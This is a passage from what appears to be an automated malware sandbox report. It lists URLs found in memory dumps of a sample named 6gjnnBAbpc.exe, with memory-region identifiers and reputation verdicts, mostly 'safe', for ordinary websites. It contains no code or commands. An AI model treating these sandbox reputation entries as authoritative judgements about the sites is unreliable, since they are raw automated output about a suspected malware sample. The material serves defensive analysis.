6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcgrate.com/wp-content/uploads/the7-css/css-vars.css?ver=899328ee298e	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://myropcb.com/login/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.winhui.cn/template/default/img/fixedimg4.png	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.2print.com/ows	6gjnnBAbpc.exe, 00000000.00000003.541644017.0000000008D3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-300x110.jpg	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pohlfood.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.10.3	6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.4	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myropcb.com/why-use-myro/terms-of-service/	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438195929.000000000A1D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pcgrate.com	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/	6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lolipop.jp/	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.naoi-a.com/	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313030097.000000000A4D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ka-mo-me.com/S	6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nelipak.nl/.K	6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.pcgrate.com	6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.mobilnic.net/upload/img/201905280859514872.png	6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.435047729.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 